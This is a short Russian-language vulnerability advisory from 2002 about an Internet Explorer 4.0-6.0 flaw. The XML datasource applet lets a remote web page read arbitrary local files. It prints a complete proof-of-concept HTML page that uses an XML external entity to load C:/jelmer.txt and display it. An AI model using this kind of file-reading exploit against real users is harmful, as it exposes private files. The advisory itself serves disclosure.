Security Lab

Доступ к произвольным файлам в в Microsoft Internet Explorer XML Datasource Applet

Дата публикации:20.08.2002
Всего просмотров:1250
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Из-за ошибки в апплете datasource, возможно просмотреть любой файл на диске через удаленную Web страницу. Пример: (отображает содержание файла C:/jelmer.txt):
<html> 
<head> 
<base href="file:///C:/"> 
</head> 
<body> 
<applet code="com.ms.xml.dso.XMLDSO.class" 
width="0" height="0" id="xmldso" MAYSCRIPT="true"> 
    <?xml version="1.0"?> 
<!DOCTYPE file [ 
<!ELEMENT file (#PCDATA) > 
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt"> 
]> 
<file> 
&contents; 
</file> 
</applet> 
<script language="javascript"> 
setTimeout("showIt()",2000); 
function showIt() { 
var jelmer = xmldso.getDocument(); 
alert(jelmer.Text); 
} 
</script> 
</body> 
</html>
уязвимость обнаружена в Microsoft Internet Explorer 4.0-6.0
Ссылки: Internet explorer can read local files